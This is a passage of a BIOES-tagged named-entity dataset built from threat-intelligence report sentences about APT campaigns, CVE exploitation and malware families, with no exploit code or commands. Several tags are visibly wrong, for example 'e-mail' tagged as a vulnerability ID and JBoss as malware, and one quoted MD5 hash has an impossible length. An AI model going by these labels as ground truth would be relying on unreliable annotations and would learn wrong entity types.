+Brokers E-APT +threat O +group O +in O +April S-TIME +. 
O + +If O +the O +DoublePulsar B-MAL +backdoor E-MAL +does O +not O +exist O +, O +then O +the O +SMB B-MAL +worm E-MAL +attempts O +to O +compromise O +the O +target O +using O +the O +Eternalblue S-VULNAME +SMBv1 S-TOOL +exploit S-VULNAME +. O + +Leafminer S-APT +has O +developed O +exploit S-VULNAME +payloads O +for O +this O +framework O +( O +Table O +2 O +) O +that O +deliver O +custom O +malware O +through O +attacks O +against O +SMB S-TOOL +vulnerabilities S-VULNAME +described O +by O +Microsoft S-IDTY +. O + +The O +EternalBlue S-VULNAME +exploits S-VULNAME +from O +the O +framework O +received O +worldwide O +attention O +after O +being O +used O +in O +the O +ransomware B-ACT +campaigns I-ACT +WannaCry E-ACT +in O +May S-TIME +and O +Petya S-MAL +/ O +NotPetya S-MAL +in O +June B-TIME +2017 E-TIME +. O + +The O +Leafminer S-APT +operators S-APT +use O +EternalBlue S-VULNAME +to O +attempt O +lateral O +movement O +within O +target O +networks O +from O +compromised O +staging O +servers O +. O + +Symantec S-SECTEAM +also O +observed O +attempts O +by O +Leafminer S-APT +to O +scan O +for O +the O +Heartbleed B-VULNAME +vulnerability E-VULNAME +( O +CVE-2014-0160 S-VULID +) O +from O +an O +attacker-controlled O +IP S-PROT +address O +. O + +The O +attachments O +exploited O +CVE-2017-8759 S-VULID +which O +was O +discovered O +and O +documented O +only O +five O +days O +prior O +to O +the O +campaign O +. O + +Some O +of O +the O +documents S-FILE +exploited O +CVE-2017-0199 S-VULID +to O +deliver O +the O +payload O +. O + +The O +group O +'s O +capabilities O +are O +more O +than O +the O +much O +discussed O +CVE-2012-0158 S-VULID +exploits O +over O +the O +past O +few O +years O +. O + +Instead O +, O +the O +Spring B-APT +Dragon I-APT +group E-APT +is O +known O +to O +have O +employed O +spearphish S-ACT +exploits S-VULNAME +, O +strategic B-ACT +web I-ACT +compromises E-ACT +, O +and O +watering B-ACT +holes I-ACT +attack E-ACT +. 
O + +The O +group O +'s O +spearphish O +toolset O +includes O +PDF S-TOOL +exploits S-VULNAME +, O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploits S-VULNAME +, O +and O +the O +common O +CVE-2012-0158 S-VULID +Word S-TOOL +exploits S-VULNAME +including O +those O +generated O +from O +the O +infamous O +" O +Tran B-MAL +Duy I-MAL +Linh E-MAL +" O +kit O +. O + +While O +this O +particular O +actor S-APT +effectively O +used O +their O +almost O +worn O +out O +CVE-2012-0158 S-VULID +exploits O +in O +the O +past O +, O +Spring B-APT +Dragon E-APT +employs O +more O +involved O +and O +creative O +intrusive O +activity O +as O +well O +. O + +To O +mitigate O +the O +threat O +of O +the O +described O +campaign O +, O +security O +teams O +can O +consider O +blocking O +access O +to O +the O +C2 S-TOOL +server O +103.236.150.14 O +and O +, O +where O +applicable O +, O +ensure O +that O +the O +Microsoft S-IDTY +Security O +Update O +KB2553204 O +is O +installed O +in O +order O +to O +patch O +the O +CVE-2017-11882 S-VULID +vulnerability O +. O + +The O +actors S-APT +attempted O +to O +exploit S-VULNAME +CVE-2014-6332 S-VULID +using O +a O +slightly O +modified O +version O +of O +the O +proof-of-concept O +( O +POC O +) O +code O +to O +install O +a O +Trojan S-MAL +called O +Emissary S-MAL +, O +which O +is O +related O +to O +the O +Operation B-ACT +Lotus I-ACT +Blossom I-ACT +campaign E-ACT +. O + +Both O +attachments O +are O +malicious B-FILE +Word I-FILE +documents E-FILE +that O +attempt O +to O +exploit S-VULNAME +the O +Windows S-OS +OLE B-TOOL +Automation I-TOOL +Array I-TOOL +Remote I-TOOL +Code I-TOOL +Execution E-TOOL +Vulnerability S-VULNAME +tracked O +by O +CVE-2014-6332 S-VULID +. O + +Lotus B-APT +Blossom E-APT +attempted O +to O +exploit S-VULNAME +CVE-2014-6332 S-VULID +using O +the O +POC O +code O +available O +in O +the O +wild O +. 
O + +Lotus B-APT +Blossom E-APT +was O +attempting O +to O +exploit S-VULNAME +CVE-2014-6332 S-VULID +to O +install O +a O +new O +version O +of O +the O +Emissary B-MAL +Trojan E-MAL +, O +specifically O +version O +5.3 O +. O + +POWRUNER S-MAL +was O +delivered O +using O +a O +malicious O +RTF B-FILE +file E-FILE +that O +exploited O +CVE-2017-0199 S-VULID +. O + +In O +November B-TIME +2017 E-TIME +, O +APT34 S-APT +leveraged O +the O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +CVE-2017-11882 S-VULID +to O +deploy O +POWRUNER S-MAL +and O +BONDUPDATER S-MAL +less O +than O +a O +week O +after O +Microsoft S-IDTY +issued O +a O +patch O +. O + +PIVY S-MAL +also O +played O +a O +key O +role O +in O +the O +2011 B-ACT +campaign E-ACT +known O +as O +Nitro O +that O +targeted O +chemical B-IDTY +makers E-IDTY +, O +government B-IDTY +agencies E-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +and O +human O +rights O +groups.10,11 O +Still O +active O +a O +year O +later O +, O +the O +Nitro O +attackers S-APT +used O +a O +zero-day S-VULNAME +vulnerability O +in O +Java O +to O +deploy O +PIVY S-MAL +in O +2012 S-TIME +. O + +Just O +recently O +, O +PIVY S-MAL +was O +the O +payload O +of O +a O +zero-day S-VULNAME +exploit S-VULNAME +in O +Internet O +Explorer O +used O +in O +what O +is O +known O +as O +a O +" O +strategic B-ACT +web I-ACT +compromise E-ACT +" O +attack O +against O +visitors O +to O +a O +U.S. S-LOC +government O +website O +and O +a O +variety O +of O +others O +. O + +It O +came O +in O +the O +form O +of O +a O +" O +Tran B-MAL +Duy I-MAL +Linh E-MAL +" O +CVE-2012-0158 S-VULID +exploit S-VULNAME +kit O +document O +MD5 S-ENCR +: O +de8a242af3794a8be921df0cfa51885f61 O +and O +was O +observed O +on O +April B-TIME +10 I-TIME +, I-TIME +2014 E-TIME +. 
O + +This O +bait B-FILE +document E-FILE +, O +or O +email B-ACT +attachment E-ACT +, O +appears O +to O +be O +a O +standard O +Word S-TOOL +document O +, O +but O +is O +in O +fact O +an O +CVE-2012-0158 S-VULID +exploit S-VULNAME +, O +an O +executable O +with O +a O +double O +extension O +, O +or O +an O +executable O +with O +an O +RTLO O +filename O +, O +so O +it O +can O +execute O +code O +without O +the O +user O +'s O +knowledge O +or O +consent O +. O + +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +both O +used O +an O +exploit S-VULNAME +for O +CVE-2016-4117 S-VULID +, O +a O +vulnerability O +in O +Adobe O +Flash S-TOOL +Player O +that O +, O +at O +the O +time O +, O +was O +both O +unknown O +and O +unpatched O +. O + +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +both O +used O +a O +zero-day S-VULNAME +exploit S-VULNAME +that O +executed O +code O +to O +download O +a O +malicious O +payload O +. O + +NEODYMIUM S-APT +also O +used O +the O +exact O +same O +CVE-2016-4117 S-VULID +exploit S-VULNAME +code O +that O +PROMETHIUM S-APT +used O +, O +prior O +to O +public O +knowledge O +of O +the O +vulnerability O +'s O +existence O +. O + +In O +May B-TIME +2016 E-TIME +, O +two O +apparently O +unrelated O +activity B-APT +groups E-APT +, O +PROMETHIUM S-APT +and O +NEODYMIUM S-APT +, O +conducted O +attack B-ACT +campaigns E-ACT +in O +Europe S-LOC +that O +used O +the O +same O +zeroday S-VULNAME +exploit S-VULNAME +while O +the O +vulnerability O +was O +publicly O +unknown O +. 
O + +The O +Middle B-LOC +Eastern E-LOC +hacker O +group O +in O +this O +case O +is O +codenamed O +" O +BlackOasis S-APT +" O +Kaspersky S-SECTEAM +found O +the O +group O +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +" O +FinSpy S-MAL +" O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday O +. O + +The O +discovery O +by O +Kaspersky S-SECTEAM +marks O +at O +least O +the O +fifth O +zero-day S-VULNAME +exploit S-VULNAME +used O +by O +BlackOasis S-APT +and O +exposed O +by O +security O +researchers O +since O +June B-TIME +2015 E-TIME +. O + +Less O +than O +a O +week O +after O +Microsoft S-IDTY +issued O +a O +patch O +for O +CVE-2017-11882 S-VULID +on O +Nov. B-TIME +14 I-TIME +, I-TIME +2017 E-TIME +, O +FireEye S-SECTEAM +observed O +an O +attacker S-APT +using O +an O +exploit S-VULNAME +for O +the O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +to O +target O +a O +government B-IDTY +organization E-IDTY +in O +the O +Middle B-LOC +East E-LOC +. O + +The O +backdoor O +was O +delivered O +via O +a O +malicious O +.rtf B-FILE +file E-FILE +that O +exploited O +CVE-2017-0199 S-VULID +. O + +In O +this O +latest O +campaign O +, O +APT34 S-APT +leveraged O +the O +recent O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +CVE-2017-11882 S-VULID +to O +deploy O +POWRUNER S-MAL +and O +BONDUPDATER S-MAL +. O + +During O +the O +past O +few O +months O +, O +APT34 S-APT +has O +been O +able O +to O +quickly O +incorporate O +exploits O +for O +at O +least O +two O +publicly O +vulnerabilities O +( O +CVE-2017-0199 S-VULID +and O +CVE-2017-11882 S-VULID +) O +to O +target O +organizations O +in O +the O +Middle B-LOC +East E-LOC +. 
O + +In O +November B-TIME +2017 E-TIME +, O +APT34 S-APT +leveraged O +the O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +CVE-2017-11882 S-VULID +to O +deploy O +POWRUNER S-MAL +and O +BONDUPDATER S-MAL +less O +than O +a O +week O +after O +Microsoft S-IDTY +issued O +a O +patch O +. O + +POWRUNER S-MAL +was O +delivered O +using O +a O +malicious B-MAL +RTF E-MAL +file O +that O +exploited O +CVE-2017-0199 S-VULID +. O + +Specifically O +, O +Suckfly O +used O +a O +specially O +crafted O +web O +page O +to O +deliver O +an O +exploit S-VULNAME +for O +the O +Microsoft S-IDTY +Windows S-OS +OLE B-TOOL +Remote I-TOOL +Code I-TOOL +Execution E-TOOL +Vulnerability S-VULNAME +( O +CVE-2014-6332 S-VULID +) O +, O +which O +affects O +specific O +versions O +of O +Microsoft S-IDTY +Windows S-OS +. O + +This O +time O +, O +however O +, O +TA459 O +opportunistically O +used O +spear-phishing S-ACT +emails S-TOOL +with O +a O +Microsoft B-FILE +Word I-FILE +attachment E-FILE +exploiting O +the O +recently O +patched O +CVE-2017-0199 S-VULID +to O +deploy O +the O +ZeroT B-MAL +Trojan E-MAL +, O +which O +in O +turn O +downloaded O +the O +PlugX B-MAL +Remote I-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +This O +time O +, O +however O +, O +attackers O +opportunistically O +used O +spear-phishing S-ACT +emails S-TOOL +with O +a O +Microsoft B-FILE +Word I-FILE +attachment E-FILE +exploiting O +the O +recently O +patched O +CVE-2017-0199 S-VULID +to O +deploy O +the O +ZeroT B-MAL +Trojan E-MAL +, O +which O +in O +turn O +downloaded O +the O +PlugX B-MAL +Remote I-MAL +Access I-MAL +Trojan E-MAL +( O +RAT S-MAL +) O +. O + +Data O +from O +the O +early O +part O +of O +this O +year O +shows O +that O +the O +Taidoor O +attackers O +rampantly O +used O +malicious.DOC S-FILE +files O +to O +exploit S-VULNAME +a O +Microsoft S-IDTY +Common B-TOOL +Controls E-TOOL +vulnerability S-VULNAME +, O +CVE-2012-0158 S-VULID +. 
O + +TG-3390 S-APT +uses O +older O +exploits O +to O +compromise O +targets O +, O +and O +CTU S-SECTEAM +researchers O +have O +not O +observed O +the O +threat O +actors O +using O +zero-day S-VULNAME +exploits O +as O +of O +this O +publication O +. O + +TG-3390 S-APT +actors O +have O +used O +Java S-TOOL +exploits O +in O +their O +SWCs S-MAL +. O + +In O +particular O +, O +TG-3390 S-APT +has O +exploited O +CVE-2011-3544 S-VULID +, O +a O +vulnerability O +in O +the O +Java O +Runtime O +Environment O +, O +to O +deliver O +the O +HTTPBrowser B-MAL +backdoor E-MAL +; O +and O +CVE-2010-0738 S-VULID +, O +a O +vulnerability O +in O +JBoss S-MAL +, O +to O +compromise O +internally O +and O +externally O +accessible O +assets O +used O +to O +redirect O +users' O +web O +browsers O +to O +exploit S-VULNAME +code O +. O + +In O +particular O +, O +the O +threat O +actors O +have O +exploited O +CVE-2011-3544 S-VULID +, O +a O +vulnerability O +in O +the O +Java O +Runtime O +Environment O +, O +to O +deliver O +the O +HTTPBrowser B-MAL +backdoor E-MAL +; O +and O +CVE-2010-0738 S-VULID +, O +a O +vulnerability O +in O +JBoss S-MAL +, O +to O +compromise O +internally O +and O +externally O +accessible O +assets O +used O +to O +redirect O +users' O +web O +browsers O +to O +exploit S-VULNAME +code O +. O + +TG-3390 O +'s O +activities S-ACT +indicate O +a O +preference O +for O +leveraging B-ACT +SWCs E-ACT +and O +scan-and-exploit B-ACT +techniques E-ACT +to O +compromise O +target O +systems O +. O + +Even O +when O +we O +observed O +LuckyMouse O +using O +weaponized O +documents O +with O +CVE-2017-11882 S-VULID +( O +Microsoft B-MAL +Office I-MAL +Equation I-MAL +Editor E-MAL +, O +widely O +used O +by O +Chinese-speaking O +actors O +since O +December B-TIME +2017 E-TIME +) O +, O +we O +can′t O +prove O +they O +were O +related O +to O +this O +particular O +attack O +. 
O + +LuckyMouse O +has O +been O +spotted O +using O +a O +widely O +used O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +( O +CVE-2017-11882 S-VULID +) O +. O + +No O +zero-day S-VULNAME +vulnerabilities O +were O +used O +to O +breach O +targeted O +networks O +, O +instead O +" O +TG-3390 O +relied O +on O +old O +vulnerabilities O +such O +as O +CVE-2011-3544 S-VULID +" O +— O +a O +near-year-old O +Java O +security O +hole O +— O +" O +and O +CVE-2010-0738 S-VULID +to O +compromise O +their O +targets O +" O +, O +Dell B-SECTEAM +SecureWorks' E-SECTEAM +researchers O +reported O +. O + +Execute O +a O +command O +through O +exploits O +for O +CVE-2017-11882 S-VULID +. O + +Execute O +a O +command O +through O +exploits O +for O +CVE-2018-0802 S-VULID +. O + +The O +document O +attached O +to O +this O +e-mail B-VULID +exploits S-VULNAME +CVE-2012-0158 S-VULID +. O + +Tropic B-APT +Trooper E-APT +is O +also O +still O +exploiting O +CVE-2012-0158 S-VULID +, O +as O +are O +many O +threat O +actors O +. O + +The O +documents S-FILE +attached O +to O +spear-phishing S-ACT +e-mails E-ACT +used O +in O +both O +attacks O +contain O +code O +that O +exploits O +CVE-2012-0158 S-VULID +, O +which O +despite O +its O +age O +remains O +one O +of O +the O +most O +common O +Microsoft B-TOOL +Word E-TOOL +vulnerabilities S-VULNAME +being O +exploited O +by O +multiple O +threat O +actors O +. O + +the O +backdoor O +is O +packaged O +together O +with O +the O +CVE-2013-5065 S-VULID +EoP S-TOOL +exploit S-VULNAME +and O +heavily O +obfuscated O +. O + +While O +we O +were O +unable O +to O +recover O +the O +initial O +vulnerability O +used O +, O +it O +is O +possibly O +the O +same O +CVE-2014-0515 S-VULID +Adobe B-TOOL +Flash E-TOOL +exploit S-VULNAME +first O +reported O +by O +Cisco B-SECTEAM +TRAC E-SECTEAM +in O +late B-TIME +July E-TIME +. 
O + +However O +, O +to O +increase O +success O +rates O +APT20 S-APT +can O +use O +zero-day S-VULNAME +exploits O +, O +so O +even O +a O +properly O +patched O +system O +would O +be O +compromised O +. O + +PLEAD S-ACT +also O +dabbled O +with O +a O +short-lived O +, O +fileless O +version O +of O +their O +malware O +when O +it O +obtained O +an O +exploit S-VULNAME +for O +a O +Flash S-TOOL +vulnerability O +( O +CVE-2015-5119 S-VULID +) O +that O +was O +leaked O +during O +the O +Hacking O +Team O +breach O +. O + +PLEAD S-ACT +also O +uses O +CVE-2017-7269 S-VULID +, O +a O +buffer O +overflow O +vulnerability O +Microsoft S-IDTY +Internet B-TOOL +Information I-TOOL +Services E-TOOL +( O +IIS S-TOOL +) O +6.0 O +to O +compromise O +the O +victim O +'s O +server O +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +has O +detected O +a O +new O +method O +of O +first O +infection O +that O +uses O +a O +drive-by-download O +with O +a O +flash S-TOOL +exploit S-VULNAME +( O +CVE-2015-5119 S-VULID +, O +the O +one O +leaked O +from O +The O +Hacking O +Team O +incident O +) O +. O + +If O +the O +document O +was O +delivered O +with O +macros O +instead O +of O +exploits O +( O +CVE-2012-0158 S-VULID +, O +CVE-2013-3906 S-VULID +or O +CVE-2014-1761 S-VULID +) O +, O +then O +the O +document O +contained O +instructions O +for O +enabling O +macros O +. O + +Moreover O +, O +they O +used O +the O +same O +exploit S-VULNAME +kit B-VULNAME +Niteris E-VULNAME +as O +that O +in O +the O +Corkow S-MAL +case O +. O + +The O +CVE-2012-0773 S-VULID +was O +originally O +discovered O +by O +VUPEN O +and O +has O +an O +interesting O +story O +. O + +The O +decoy B-MAL +documents E-MAL +used O +by O +the O +InPage S-TOOL +exploits S-VULNAME +suggest O +that O +the O +targets O +are O +likely O +to O +be O +politically S-IDTY +or O +militarily S-IDTY +motivated O +. 
O + +While O +documents O +designed O +to O +exploit S-VULNAME +the O +InPage B-MAL +software E-MAL +are O +rare O +, O +they O +are O +not O +new O +– O +however O +in O +recent O +weeks O +Unit42 S-SECTEAM +has O +observed O +numerous O +InPage S-TOOL +exploits S-VULNAME +leveraging O +similar O +shellcode O +, O +suggesting O +continued O +use O +of O +the O +exploit S-VULNAME +previously O +discussed O +by O +Kaspersky S-SECTEAM +. O + +Compared O +to O +Patchwork S-APT +, O +whose O +Trojanized O +documents O +exploit S-VULNAME +at O +least O +five O +security O +flaws O +, O +Confucius' O +backdoors O +are O +delivered O +through O +Office O +files O +exploiting O +memory O +corruption O +vulnerabilities O +CVE-2015-1641 S-VULID +and O +CVE-2017-11882 S-VULID +. O + +Lately O +, O +Patchwork S-APT +has O +been O +sending O +multiple O +RTF B-FILE +files E-FILE +exploiting O +CVE-2017-8570 S-VULID +. O + +Confucius' B-MAL +backdoors E-MAL +are O +delivered O +through O +Office O +documents O +exploiting O +memory O +corruption O +vulnerabilities O +CVE-2015-1641 S-VULID +and O +CVE-2017-11882 S-VULID +. O + +The O +sctrls B-MAL +backdoor E-MAL +we O +came O +across O +is O +delivered O +via O +RTF B-ACT +files E-ACT +exploiting O +CVE-2015-1641 S-VULID +. O + +The O +documents O +that O +exploit S-VULNAME +CVE-2017-11882 S-VULID +download O +another O +payload O +— O +an O +HTML B-TOOL +Application E-TOOL +( O +HTA S-TOOL +) O +file O +toting O +a O +malicious O +Visual B-TOOL +Basic E-TOOL +( O +VBS S-TOOL +) O +script O +— O +from O +the O +server O +, O +which O +is O +executed O +accordingly O +by O +the O +command-line O +tool O +mshta.exe S-FILE +. O + +Hackers O +use O +the O +exploits O +" O +Nitris B-VULNAME +Exploit I-VULNAME +Kit E-VULNAME +" O +( O +earlier O +known O +as O +CottonCastle S-VULNAME +) O +, O +which O +is O +not O +available O +in O +open O +sources O +and O +sold O +only O +to O +trusted O +users O +. 
O + +Hackers O +first O +actively O +spread O +bots O +using O +the O +Niteris S-TOOL +exploit S-VULNAME +, O +and O +then O +search O +for O +infected O +devices O +at O +banks S-IDTY +amongst O +their O +bots O +by O +analyzing O +IP S-PROT +addresses O +, O +cracked O +passwords O +and O +results O +of O +the O +modules O +performance O +. O + +In O +August B-TIME +2014 E-TIME +, O +some O +of O +our O +users O +observed O +targeted B-ACT +attacks E-ACT +with O +a O +variation O +of O +CVE-2012-0158 S-VULID +and O +an O +unusual O +set O +of O +malware O +. O + +Longhorn O +, O +which O +we O +internally O +refer O +to O +as O +" O +The B-APT +Lamberts E-APT +" O +, O +first O +came O +to O +the O +attention O +of O +the O +ITSec B-SECTEAM +community E-SECTEAM +in O +2014 S-TIME +, O +when O +our O +colleagues O +from O +FireEye S-SECTEAM +discovered O +an O +attack O +using O +a O +zero B-VULNAME +day E-VULNAME +vulnerability S-VULNAME +( O +CVE-2014-4148 S-VULID +) O +. O + +The O +first O +time O +the O +Lambert B-MAL +family I-MAL +malware E-MAL +was O +uncovered O +publicly O +was O +in O +October B-TIME +2014 E-TIME +, O +when O +FireEye S-SECTEAM +posted O +a O +blog O +about O +a O +zero B-VULNAME +day E-VULNAME +exploit S-VULNAME +( O +CVE-2014-4148 S-VULID +) O +used O +in O +the O +wild O +. O + +While O +in O +most O +cases O +the O +infection O +vector O +remains O +unknown O +, O +the O +high B-ACT +profile I-ACT +attack E-ACT +from O +2014 S-TIME +used O +a O +very O +complex O +Windows S-OS +TTF O +zero-day S-VULNAME +exploit S-VULNAME +( O +CVE-2014-4148 S-VULID +) O +. O + +To O +further O +exemplify O +the O +proficiency O +of O +the O +attackers O +leveraging O +the O +Lamberts B-MAL +toolkit E-MAL +, O +deployment O +of O +Black B-MAL +Lambert E-MAL +included O +a O +rather O +sophisticated O +TTF O +zero B-VULNAME +day E-VULNAME +exploit S-VULNAME +, O +CVE-2014-4148 S-VULID +. 
O + +This O +sample O +was O +also O +found O +to O +be O +deployed O +using O +the O +CVE-2012-0158 S-VULID +vulnerability O +. O + +Our O +analysis O +shows O +that O +actors O +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +NetTraveler B-MAL +Trojan E-MAL +. O + +Unit B-SECTEAM +42 E-SECTEAM +'s O +analysis O +shows O +that O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +NetTraveler B-MAL +Trojan E-MAL +. O + +Our O +analysis O +shows O +that O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +NetTraveler B-MAL +Trojan E-MAL +. O + +In O +this O +report O +, O +we'll O +review O +how O +the O +actors O +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +the O +NetTraveler B-MAL +Trojan E-MAL +. O + +In O +this O +report O +, O +we'll O +review O +how O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +the O +NetTraveler B-MAL +Trojan E-MAL +. O + +In O +this O +report O +, O +we'll O +review O +how O +the O +NetTraveler S-MAL +attempted O +to O +exploit S-VULNAME +CVE-2012-0158 S-VULID +to O +install O +the O +NetTraveler B-MAL +Trojan E-MAL +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +'s O +products O +detect O +the O +Microsoft B-IDTY +Office E-IDTY +exploits S-VULNAME +used O +in O +the O +spear-phishing S-ACT +attacks E-ACT +, O +including O +Exploit.MSWord.CVE-2010-333 S-FILE +, O +Exploit.Win32.CVE-2012-0158 S-FILE +. O + +The O +files S-FILE +exploit S-VULNAME +the O +well-known O +Microsoft B-TOOL +Office E-TOOL +vulnerability O +, O +CVE-2012-0158 S-VULID +, O +to O +execute O +malicious O +code O +in O +order O +to O +take O +control O +of O +the O +targeted O +systems O +. 
O + +Earlier O +this O +month O +, O +Securelist S-SECTEAM +'s O +technology O +caught O +another O +zero-day S-VULNAME +exploits O +deployed O +in O +targeted B-ACT +attacks E-ACT +. O + +Operation B-ACT +Daybreak E-ACT +appears O +to O +have O +been O +launched O +by O +ScarCruft O +in O +March B-TIME +2016 E-TIME +and O +employs O +a O +previously O +unknown O +( O +0-day S-VULNAME +) O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploit S-VULNAME +. O + +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploit S-VULNAME +. O + +It O +is O +also O +possible O +that O +ScarCruft S-APT +deployed O +another O +zero B-VULNAME +day E-VULNAME +exploit S-VULNAME +, O +CVE-2016-0147 S-VULID +, O +which O +was O +patched O +in O +April O +. O + +Operation B-ACT +Erebus E-ACT +leverages O +another O +Flash B-TOOL +Player E-TOOL +exploit S-VULNAME +( O +CVE-2016-4117 S-VULID +) O +through O +the O +use O +of O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +ScarCruft S-APT +'s O +Operation B-ACT +Erebus E-ACT +leverages O +another O +Flash B-TOOL +Player E-TOOL +exploit S-VULNAME +( O +CVE-2016-4117 S-VULID +) O +through O +the O +use O +of O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +Nevertheless O +, O +resourceful O +threat O +actors O +such O +as O +ScarCruft S-APT +will O +probably O +continue O +to O +deploy O +zero-day S-VULNAME +exploits O +against O +their O +high O +profile O +targets O +. O + +This O +malware O +uses O +the O +public O +privilege O +escalation O +exploit S-VULNAME +code O +CVE-2018-8120 S-VULID +or O +UACME S-MAL +which O +is O +normally O +used O +by O +legitimate O +red O +teams O +. O + +Earlier O +this O +month O +, O +we O +caught O +another O +zero-day S-VULNAME +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +exploits O +deployed O +in O +targeted B-ACT +attacks E-ACT +. 
O + +The O +other O +one O +, O +ScarCruft O +'s O +Operation B-ACT +Erebus E-ACT +employs O +an O +older O +exploit S-VULNAME +, O +for O +CVE-2016-4117 S-VULID +and O +leverages O +watering B-ACT +holes E-ACT +. O + +The O +other O +one O +, O +" O +Operation B-ACT +Erebus E-ACT +" O +employs O +an O +older O +exploit S-VULNAME +, O +for O +CVE-2016-4117 S-VULID +and O +leverages O +watering B-ACT +holes E-ACT +. O + +The O +ScarCruft O +APT O +gang O +has O +made O +use O +of O +a O +Flash S-TOOL +zero B-VULNAME +day E-VULNAME +patched O +Thursday O +by O +Adobe O +to O +attack O +more O +than O +two O +dozen O +high-profile O +targets O +in O +Russia S-LOC +and O +Asia S-LOC +primarily O +. O + +Adobe O +on O +Thursday O +patched O +a O +zero-day S-VULNAME +vulnerability O +in O +Flash S-TOOL +Player O +that O +has O +been O +used O +in O +targeted B-ACT +attacks E-ACT +carried O +out O +by O +a O +new O +APT O +group O +operating O +primarily O +against O +high-profile O +victims O +in O +Russia S-LOC +and O +Asia S-LOC +. O + +Researchers O +at O +Kaspersky B-SECTEAM +Lab E-SECTEAM +privately O +disclosed O +the O +flaw O +to O +Adobe O +after O +exploits O +against O +the O +zero-day S-VULNAME +were O +used O +in O +March S-TIME +by O +the O +ScarCruft O +APT O +gang O +in O +what O +Kaspersky B-SECTEAM +Lab E-SECTEAM +is O +calling O +Operation B-ACT +Daybreak E-ACT +. O + +Kaspersky S-SECTEAM +speculates O +that O +ScarCruft S-APT +could O +also O +be O +behind O +another O +zero-day S-VULNAME +, O +CVE-2016-0147 S-VULID +, O +a O +vulnerability O +in O +Microsoft S-IDTY +XML S-TOOL +Core O +Services O +that O +was O +patched O +in O +April S-TIME +. O + +Another O +set O +of O +attacks O +called O +Operation B-ACT +Erebus E-ACT +leverages O +another O +flash S-TOOL +exploit S-VULNAME +, O +CVE-2016-4117 S-VULID +, O +and O +relies O +on O +watering B-ACT +hole I-ACT +attacks E-ACT +as O +a O +means O +of O +propagation O +. 
O + +Thursday O +'s O +Flash S-TOOL +Player O +update O +patched O +36 O +vulnerabilities O +in O +total O +including O +the O +zero B-VULNAME +day E-VULNAME +CVE-2016-4171 S-VULID +. O + +Wild B-APT +Neutron E-APT +'s O +attacks O +in O +2015 S-TIME +uses O +a O +stolen B-MAL +code I-MAL +signing I-MAL +certificate E-MAL +belonging O +to O +Taiwanese S-LOC +electronics S-IDTY +maker O +Acer O +and O +an O +unknown O +Flash B-TOOL +Player E-TOOL +exploit S-VULNAME +. O + +Wild B-APT +Neutron E-APT +'s O +attack O +took O +advantage O +of O +a O +Java S-TOOL +zero-day S-VULNAME +exploit S-VULNAME +and O +used O +hacked O +forums O +as O +watering B-ACT +holes E-ACT +. O + +Instead O +of O +Flash S-TOOL +exploits S-VULNAME +, O +older O +Wild O +Neutron O +exploitation O +and O +watering B-ACT +holes E-ACT +used O +what O +was O +a O +Java S-TOOL +zero-day S-VULNAME +at O +the O +end B-TIME +of I-TIME +2012 E-TIME +and O +the O +beginning B-TIME +of I-TIME +2013 E-TIME +, O +detected O +by O +Kaspersky B-SECTEAM +Lab E-SECTEAM +products O +as O +Exploit.Java.CVE-2012-3213.b S-VULID +. O + +In O +that O +case O +, O +we O +observed O +Buhtrap S-APT +using O +a O +local O +privilege O +escalation O +exploit S-VULNAME +, O +CVE-2019-1132 S-VULID +, O +against O +one O +of O +its O +victims O +. O + +Prior O +to O +that O +report O +, O +we O +published O +detail O +analysis O +on O +malware O +exploiting O +CVE-2018-8414 S-VULID +vulnerability O +(remote O +code O +execution O +in O +SettingContent-ms) O +, O +which O +is O +believed O +a O +work O +of O +DarkHydrus S-APT +. 
O + +WannaCry S-ACT +incorporated O +the O +leaked O +EternalBlue S-VULNAME +exploit S-VULNAME +that O +used O +two O +known O +vulnerabilities O +in O +Windows S-OS +CVE-2017-0144 S-VULID +and O +CVE-2017-0145 S-VULID +to O +turn O +the O +ransomware O +into O +a O +worm O +, O +capable O +of O +spreading O +itself O +to O +any O +unpatched O +computers O +on O +the O +victim's O +network O +and O +also O +to O +other O +vulnerable O +computers O +connected O +to O +the O +internet O +. O + +One O +vulnerability O +is O +a O +Windows S-OS +zero-day S-VULNAME +vulnerability O +( O +CVE-2019-0703 S-VULID +) O +discovered O +by O +Symantec S-SECTEAM +. O +Bemstour S-APT +exploits O +two O +Windows S-OS +vulnerabilities S-VULNAME +in O +order O +to O +achieve O +remote O +kernel O +code O +execution O +on O +targeted O +computers O +. O + +The O +second O +Windows S-OS +vulnerability O +( O +CVE-2017-0143 O +) O +was O +patched O +in O +March B-TIME +2017 E-TIME +after O +it O +was O +discovered O +to O +have O +been O +used O +by O +two O +exploit S-VULNAME +tools—EternalRomance O +and O +EternalSynergy—that O +were O +also O +released O +as O +part O +of O +the O +Shadow B-APT +Brokers E-APT +leak O +. O + +These O +include O +CVE-2010-3962 S-VULID +as O +part O +of O +an O +attack B-ACT +campaign E-ACT +in O +2010 S-TIME +and O +CVE-2014-1776 S-VULID +in O +2014 S-TIME +. O +Beginning O +in O +August B-TIME +2016 E-TIME +, O 